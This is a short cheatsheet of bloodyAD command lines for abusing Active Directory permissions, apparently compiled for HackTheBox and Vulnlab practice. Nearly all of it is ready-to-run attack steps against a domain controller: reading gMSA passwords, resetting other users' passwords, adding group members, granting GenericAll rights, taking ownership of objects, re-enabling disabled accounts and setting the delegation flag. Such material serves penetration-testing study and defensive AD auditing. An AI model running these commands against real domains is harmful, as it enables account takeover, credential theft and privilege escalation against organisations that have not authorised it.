BloodyAD Cheatsheet
Retrieve User Information
bloodyAD --host $dc -d $domain -u $username -p $password get object $target_username
Add User To Group
bloodyAD --host $dc -d $domain -u $username -p $password add groupMember $group_name $member_to_add
Change Password
bloodyAD --host $dc -d $domain -u $username -p $password set password $target_username $new_password
Give User GenericAll Rights
bloodyAD --host $dc -d $domain -u $username -p $password add genericAll $DN $target_username
WriteOwner
bloodyAD --host $dc -d $domain -u $username -p $password set owner $target_group $target_username
ReadGMSAPassword
bloodyAD --host $dc -d $domain -u $username -p $password get object $target_username --attr msDS-ManagedPassword
Enable a Disabled Account
bloodyAD --host $dc -d $domain -u $username -p $password remove uac $target_username -f ACCOUNTDISABLE
Add The TRUSTED_TO_AUTH_FOR_DELEGATION Flag
bloodyAD --host $dc -d $domain -u $username -p $password add uac $target_username -f TRUSTED_TO_AUTH_FOR_DELEGATION
Notes
To use Kerberos, obtain a TGT and then pass -k
instead of providing a username and password
Resources
- Redelegate (Vulnlab)
- Vintage (HackTheBox)
- Infiltrator (HackTheBox)
- Rebound (HackTheBox)
- Absolute (HackTheBox)
- Certified (HackTheBox)